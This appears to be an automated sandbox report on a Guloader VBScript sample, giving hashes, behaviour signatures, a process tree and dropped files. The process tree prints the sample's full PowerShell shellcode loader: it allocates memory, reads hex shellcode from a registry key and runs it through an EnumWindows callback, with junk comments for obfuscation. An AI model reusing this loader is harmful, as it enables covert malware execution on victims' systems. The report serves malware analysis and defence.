Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26-12-2024 20:33

General

  • Target

    JaffaCakes118_7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9.vbs

  • Size

    344KB

  • MD5

    26c1961c629a942788089f89b1cac50c

  • SHA1

    935559fe62e2178e4efc45a31ab1d11488d8412c

  • SHA256

    7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9

  • SHA512

    5ca13c271e755ff13a6926a20773af65c4aa755a92f4a4e3891558675acd0738b2fcdf1873bd1545a21ebcae771275ec35ff36c866b0cd9be8970a7f11a415ce

  • SSDEEP

    1536:N64IoY2vqki1BN/cjGRhMR+ebjz9IjRmvog6nCaysWYp2IazMRAt6DziIwNFczqt:KoRyk1SXCXz99vog6jysuMRkmiIY+y

Malware Config

Signatures

  • Guloader family
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2168
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# I n d i   T e t r a   P e r r a d   N d v e   A t t r u p s   E f t e r g i   B e g y n   P u r l i   B a s i   L a v v   H e a d l i   I s b n   a f a r t e r n e   T i l b a g e d a t   H i g h l y r   U n l o v e l i e   G d s k   U d s i g   S p i n c o v a   S a n k e k o   F u n d   d e n o t a t i   S i n s o p s g   Z y g o s   E m p y r e u   T o a s t e d   N o n e n   X e r o g r a p h   L a t i g    
 # P a r t r i   M u t a r o t a t   T r a l l   S e m i h i s t   Z y g o m y c e   T i g e r e n   C e n t r   S t u t   V a g t p o   C h a r m e   K y n d e l m i s   B e t r   l a s s i   P h i l i   l o v o v e r t r   M o u i l l e b r   T u b a t e b i   A f v n n e d e   T w i l i   A l c a i   L t n i n g p u l   M u c i n    
 # S l b e r n e   b i l l e d   T e l e v   V e r d e n s   C o n s e c r   A r b e j d s f o   F e r i e u g e u d   F l a m b   B r i l l e   A d z e r   T h e o r e t i   E n c h a s e   s l a n g   B o r t f    
 $ M a s t e r M i n d   =   [ c h a r ] 3 4   +   " N "   +   " t A l "   +   " l o c "   +   " a t e " + " V i "   +   " r t u a l "   +   " M e m o r y "   +   [ c h a r ] 3 4  
  
 # F i n t m a s k   R o k k e d e   C o n s i   S u b d e f i   N e p o t i s t   P u p i l   F e s t l i g h o l   F o r s t y r   P r o d u k t a n s   N e p h r a d e   R i b b o n f   I n v i o l a t e d   P u d e n t t e   M e l a n c h o   P r o e p i m e r o   S k i f t   M e r k a n t i l i   B e g y n d e l s e   C e r u l e   S o m a   K e g l e r s f r e   T a n d g l a s   O u t p a c e s c r   A a b n i n g   V a n g l    
 # D y s t o m o u s y   E i r e   C a p l i n c   S m r r   S c h a c h t s c   C o l o s t r u   N s e v r d i g e n   S e m i h i   N i t r   M o i r e s m a a p   A t e l i e r   S k o k k   P a r t i c   N o n a c   R a m i   D u c h e s s e    
 # F i n g e r s p i d   A v l s h i n   I n c i v   P r e d e   S t a t i o   r e v i n d   K a i l y a r d e r   E l e a z a r b   P r o p i t   B a s h j   H u l s k e e    
  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   U n e u p h o 1  
 {  
 [ D l l I m p o r t ( " k e r n e l 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   S l e e p E x ( i n t   B r a d y s p 0 ) ;  
 [ D l l I m p o r t ( " u s e r 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   G e t W i n d o w D C ( ) ;  
  
 [ D l l I m p o r t ( " n t d l l " ,   E n t r y P o i n t = $ M a s t e r M i n d ) ] p u b l i c   s t a t i c   e x t e r n   i n t   V i t r o S o l i d ( i n t   U n e u p h o 6 , r e f   I n t 3 2   B i l l e r 2 1 4 , i n t   S t r a n d f , r e f   I n t 3 2   U n e u p h o , i n t   O v e r p a i n t r , i n t   U n e u p h o 7 ) ;  
 [ D l l I m p o r t ( " D 2 s t a m p " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   P o o l S t a c k ( ) ;  
 [ D l l I m p o r t ( " u s e r 3 2 " ,   E n t r y P o i n t = " E n u m W i n d o w s " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   M o r q q ( u i n t   S t r a n d f 5 , i n t   S t r a n d f 6 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   R t l M o v e M e m o r y ( I n t P t r   S t r a n d f 1 , r e f   I n t 3 2   S t r a n d f 2 , i n t   S t r a n d f 3 ) ;  
  
 }  
 " @  
 # S e m a n t i   P r e s l i c   R a n u l a s t o   S o i r e e   U n d d r a g e   F u s s p   P l e i   S t e r n   S c o t c h w   S a c c h a r o c   F o d f s   S p a n i e l w   D e m o   H y p o f   S i a l o a n   S t o r m f a l d   F r g e   I n d e k l i m   T j e n   C h a r m   E s p i e r n   S p a t i n g s   T i g h   p o l y i m i d e p   K u e l s e p r   E r i n d   S w e l l   T i l e      
 $ U n e u p h o 3 = 0 ;  
 # R e e m i g r   T a y r   E v a n g e l i   M e c k e l i a n   t e m p e l   D i s a r r a y s   S t r a a l i n g   B a r o s m a p   E m e r g e r s   P o s e t b a s   P r e t r i   A a l a n d s k m a   O v e r t a l    
 $ U n e u p h o 9 = 1 0 4 8 5 7 6 ;  
 # N o r d m n d   F i l k a l d   S e t t e r   P r o p o s i t i   R e n s k   P r e p   M a n d a l a y   A n k r i n g s a f   S a l t i g r a   S j i p p e s o   h o r n i e r   H y g r o   D i n e r s   T r n e n   T r e m a n   G a m l i n g b n    
 $ U n e u p h o 8 = [ U n e u p h o 1 ] : : V i t r o S o l i d ( - 1 , [ r e f ] $ U n e u p h o 3 , 0 , [ r e f ] $ U n e u p h o 9 , 1 2 2 8 8 , 6 4 )  
 # U n e n v i r o   I n d l e v e r e   E f t e   O p a c o u s n   E v e n   C h a r g e r e   S a t s   R e f l   P a m o r t h o p e   u b e k v e m m   D i c t a m   T e l e g r   H i p b e r    
 $ B e g r = ( G e t - I t e m P r o p e r t y   - P a t h   " H K C U : \ S o f t w a r e \ D e f o s s " ) . S a n c y p e s t i  
 # B u n d r e k o   R e k t i f   U n c o m p a t i   H a e v d o v e   O e u v r   P h o t o   S a l t c h u c k e   B o r g h e r r e n   S i k r i n g s s   D u n c h f l i s   A n i m i z e d   L i n i n g t r i   B h a v a n a d   F a v o r i   A p o t y p i c p   S v a l i n   K v a n   C y p r i   F l l e d e   I m p e   S t u d i e k o   D o s m e r e n p a   T a l l   L e v n e d   U n d e r h a a n d   S t e l l e n d e   C l u m s i n   R e h a b   C o l l   S y s t e m f   I d e a i s t i c   I m p u t a b l   G r a v i t a t    
 $ B e d r   =   [ S y s t e m . B y t e [ ] ] : : C r e a t e I n s t a n c e ( [ S y s t e m . B y t e ] , $ B e g r . L e n g t h   /   2 )  
 # T a l e p d a g o   R u s k r e g n e n   O v e r l e w   S k i f   I n i q u i t i e   r o a d w   u d s l u   B e t r k   T o r n e s t r   L u m b a r s   P a r o n   T o r v e h a n d e   U d m a t r i   S i d a l c   M e r c e    
 F o r ( $ i = 0 ;   $ i   - l t   $ B e g r . L e n g t h ;   $ i + = 2 )  
 	 {  
                 $ B e d r [ $ i / 2 ]   =   [ c o n v e r t ] : : T o B y t e ( $ B e g r . S u b s t r i n g ( $ i ,   2 ) ,   1 6 )  
         }  
  
  
 f o r ( $ S t e r e o 1 2 5 = 0 ;   $ S t e r e o 1 2 5   - l t   $ B e d r . c o u n t   ;   $ S t e r e o 1 2 5 + + )  
 {  
 	  
 [ U n e u p h o 1 ] : : R t l M o v e M e m o r y ( $ U n e u p h o 3 + $ S t e r e o 1 2 5 , [ r e f ] $ B e d r [ $ S t e r e o 1 2 5 ] , 1 )  
  
 }  
 [ U n e u p h o 1 ] : : M o r q q ( $ U n e u p h o 3 ,   0 )  
  
  
 "
      2⤵
      • Checks QEMU agent file
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2060
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\9dxjs_-h.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3004
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8EC9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8EC8.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2284
      • C:\Program Files (x86)\internet explorer\ieinstal.exe
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        3⤵
        • Checks QEMU agent file
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        PID:2944

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\9dxjs_-h.dll

    Filesize

    3KB

    MD5

    86eeccd412b0611b904e6b7cee9a9ebc

    SHA1

    8906b31330b2c60dedbefe3c581f49b1bb7dfade

    SHA256

    2154de0277d00d2a9ed605feabe40e25bcfc5f10f365ea01b05448c0d48ce79e

    SHA512

    5c2e597bbb2b8f3c3f72f775d9a17add8e335655b1635175a8c39f37169f3dbf873a4a869b1c5d5f6df9a5d96f5aa59a225d8622881478ba0fb163b7ac739ae3

  • C:\Users\Admin\AppData\Local\Temp\9dxjs_-h.pdb

    Filesize

    7KB

    MD5

    ddc7f6cd16d069cb9562d267e9db9296

    SHA1

    51a147d5f97ae7efad3660bc920203a49f4b1726

    SHA256

    bb14e8ccfeb8bfa91861653cac440d27a48e1f585fe2bcf16771752b38eb6c4a

    SHA512

    8c2053a245916eaac60e901f530e2a317a5892a319f8e608f62e1352bddb84de446a1ba57d1b65009079c6b81e3350b7e79ded7e41e1c6ddabbe2220868284f5

  • C:\Users\Admin\AppData\Local\Temp\RES8EC9.tmp

    Filesize

    1KB

    MD5

    4045d2cd8c556267c4f3b2f1c0eccd4d

    SHA1

    1baebacbc370aa7c086b37d937f5c5848589798e

    SHA256

    0fc3801ccb8fe168332ea2e87471c6fa50a08e3021fb119796688a72462241ff

    SHA512

    b6d739211edae0b7d4b1887f6dc4b14e2ef5e29d8eb0abf7ec5e50793da916ae77f773761d0387d1a3815718dae172d7bb10ac0455cd476eb2b78db978457f7d

  • \??\c:\Users\Admin\AppData\Local\Temp\9dxjs_-h.0.cs

    Filesize

    706B

    MD5

    2f2d59ad9746f83211ab41b81f4ffb53

    SHA1

    3266d96213f29e9d3b556b124df0f617e30e6037

    SHA256

    841ca0fdae8cb9d8d1c70b96dd57ba4fd2c6df399be995b63028a9e9b218d1b9

    SHA512

    e5baea9a9115a2cd410894f140099b5c6a2acf494c1f5b6ee773ea2513b067039f4f7dffdb83ca60e7793fbb2be23b29fab1c4a5ca72844d75a77b02696ccde2

  • \??\c:\Users\Admin\AppData\Local\Temp\9dxjs_-h.cmdline

    Filesize

    309B

    MD5

    5e16c1a5844bec09ea7735c386f4a0d0

    SHA1

    d5ebbc2e052d13a2911f8bfa60eaf74a2296647b

    SHA256

    505f7fd13c801923e1eb5e7e6f8d6f10745a148adfcd8a352d3316679e73bd26

    SHA512

    4647cfcdc13eba116313606cf4b64ee0e87cbc2fe24d52b2c2bda5847db055f7c3a579ddca2f7bc0b9f69074f008395e6fef5890fd311798bfdeecd668991603

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC8EC8.tmp

    Filesize

    652B

    MD5

    9526e488ee9c2226419fe16b57b5f091

    SHA1

    a7a982b25a0bdaeda8258894ef2db7d24442900d

    SHA256

    79326bee850955621515eb9f5a470ac7204ef53127a209b804b1fddd3d5f8dbb

    SHA512

    e8a9db9980cc704a9b1cd2f325ec096ef80e97bd6a280ef5d517081e22873b545d6b5232c5a5913a514439e359e1c5d63b9afc1cfe2d2c0c44ef5e6bd5dd0c2e

  • memory/2060-6-0x0000000073F10000-0x00000000744BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2060-2-0x0000000073F11000-0x0000000073F12000-memory.dmp

    Filesize

    4KB

  • memory/2060-5-0x0000000073F10000-0x00000000744BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2060-4-0x0000000073F10000-0x00000000744BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2060-3-0x0000000073F10000-0x00000000744BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2060-22-0x0000000073F10000-0x00000000744BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2944-23-0x0000000000150000-0x0000000000250000-memory.dmp

    Filesize

    1024KB

  • memory/2944-38-0x0000000000400000-0x0000000000615000-memory.dmp

    Filesize

    2.1MB